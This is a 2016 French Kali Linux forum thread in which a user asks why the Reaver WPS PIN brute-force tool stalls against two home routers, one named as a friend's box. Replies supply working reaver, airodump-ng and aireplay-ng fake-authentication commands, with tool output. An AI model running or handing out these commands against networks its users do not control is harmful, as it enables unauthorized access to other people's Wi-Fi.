Auteur Sujet: Reaver  (Lu 3337 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Artis22
  • Nouvel inscrit
  • Messages: 6
  • +0/-0
Reaver
« le: 02 novembre 2016 à 19:26:56 »
Bonjour,
Après plusieurs test de Reaver, voici mon soucis.

root@kali:~# reaver -i wlan0mon -b [Adresse MAC] -vv -r 3:60

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

  • Waiting for beacon from  [Adresse MAC]
  • Switching wlan0mon to channel 1
  • Switching wlan0mon to channel 11
  • Switching wlan0mon to channel 2
  • Switching wlan0mon to channel 3
  • Switching wlan0mon to channel 11
  • Switching wlan0mon to channel 4
  • Switching wlan0mon to channel 5
  • Switching wlan0mon to channel 11
  • Associated with  [Adresse MAC]  (ESSID: Neufbox_demoimeme)
  • Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
  • Trying pin 12345670.
  • Switching wlan0mon to channel 6
  • Switching wlan0mon to channel 7
  • Switching wlan0mon to channel 11
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request


Sur une autre box, il me refait autre chose, en boucle :

root@kali:~# reaver -i wlan0mon -b [Adresse MAC] -vv -r 3:60

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

  • Waiting for beacon from  [Adresse MAC]
  • Switching wlan0mon to channel 1
  • Associated with  [Adresse MAC]  (ESSID: Bbox_du_copain)
  • Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
  • Trying pin 12345670.
  • Switching wlan0mon to channel 1
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x02), re-trying last pin


     Je suis equipé de la AWUS036H.
    Y'a t-il un problème dans ma ligne de commande ? Où est l'erreur ?  ???
    Sur une autre box, il me fait une erreur 0x02, et test le meme code pin en boucle.

    Merci  ;D

Hors ligne Koala
  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 331
  • +19/-0
Re : Reaver
« Réponse #1 le: 02 novembre 2016 à 20:52:18 »
Attention car depuis les vulnérabilités wps ceratains routeurs ont le wps activés mais non configurés.Sur ma bbox il est juste activé mais pas de pin configuré.Sur sfe, j'ai eu le neufbox 6, ça lance une session de pin aléatoire seulement pendant 2 minutes.Donc vérifis bien les paramètres wps sur ta box avant de tester  :)

Hors ligne Teeknofil
  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 367
  • +28/-6
    • https://www.youtube.com/watch?v=R-zrnglcNuA&list=PLeu60bO1b61HE25L8Sz-cC7xjFupaSuWc
Re : Reaver
« Réponse #2 le: 02 novembre 2016 à 21:55:30 »
il faut fixer le wps avec airodump-ng, je suis pas sur de ma commande car j'ai pas mon terminal kali sous la main mais cela doit être ça :

airodump-ng -c  <n° de channel> --bssid <m@c> --wps
A vérifié avec le manuel

airodump-ng --help
Hacking Debutant - Black Hat Ackademy : https://www.udemy.com/draft/2365526/?couponCode=PROMOTION

Hors ligne kcdtv

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 641
  • +61/-3
    • wifi-libre
Re : Reaver
« Réponse #3 le: 04 novembre 2016 à 14:42:45 »
Fixer le canal de notre choix se fait directement avec reaver, pas besoin d'ouvrir airodump-ng  ;)
-c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)On peut aussi utiliser -f, --fixed                     Disable channel hoppingUne fois que reaver s'associe avec le point d'accès il reste dans le canal.

Hors ligne Teeknofil
  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 367
  • +28/-6
    • https://www.youtube.com/watch?v=R-zrnglcNuA&list=PLeu60bO1b61HE25L8Sz-cC7xjFupaSuWc
Re : Reaver
« Réponse #4 le: 04 novembre 2016 à 16:59:43 »
kcdtv je sais que ta plus d’expérience que moi dans le wifi mais est ce que tu a déjà utilisé l'option --wps d'airodump-ng ? Cette option permet de trouvé les AP vulnérables ce qui est mieux que wash. Concernant le canal et le fake auth, il vaut mieux utilisé aireplay-ng pour s’associe à l'AP pour utilisé les option de ré association tous les  10 seconde et tant qu'a faire ça au tant utilisé airodump-ng pour fixé le canal.
Hacking Debutant - Black Hat Ackademy : https://www.udemy.com/draft/2365526/?couponCode=PROMOTION

Hors ligne Koala
  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 331
  • +19/-0
Re : Reaver
« Réponse #5 le: 04 novembre 2016 à 21:34:47 »
Perso j'utilisai ça a l'époque:

aireplay-ng -1 120 -a <bssid> -e <essid> -h <mac> --ignore-negative-one mon0
Et

reaver -i mon0 -c 6 -A -b bssid -vv -N -t 5 -L -r 1:60 -S
aireplay-ng a 120 avec l'option suivante du coup qui demande de faire une pause de 60 seconde entre 2 tests.Après j'ai envie de dire peut importe la technique tant qu'elle est bénéfique.

Hors ligne Teeknofil
  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 367
  • +28/-6
    • https://www.youtube.com/watch?v=R-zrnglcNuA&list=PLeu60bO1b61HE25L8Sz-cC7xjFupaSuWc
Re : Reaver
« Réponse #6 le: 04 novembre 2016 à 23:08:47 »
A non koala ta commande ne va pas, tu garde pas les paquet en vie pour être authentifier en permanence. Voici ma petite commande magique qui fonctionne sur toutes les AP, c'est du 8 ans d'ages, c'est pour dire que c'est du du bon.

aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <Mac_AP> -h <Mac_Hacker> wlan0
Il y a des truc qui ce perde depuis qu'on attaque plus le wep.
Hacking Debutant - Black Hat Ackademy : https://www.udemy.com/draft/2365526/?couponCode=PROMOTION